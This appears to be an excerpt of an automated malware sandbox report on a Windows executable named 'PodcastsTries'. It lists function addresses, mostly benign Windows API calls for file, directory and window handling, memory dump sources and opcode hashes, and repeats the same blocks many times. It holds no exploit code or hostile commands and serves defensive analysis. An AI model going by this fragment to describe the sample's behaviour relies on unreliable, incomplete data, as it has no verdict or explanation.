                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                          Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                          Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                          Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                          Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                          Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                          Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
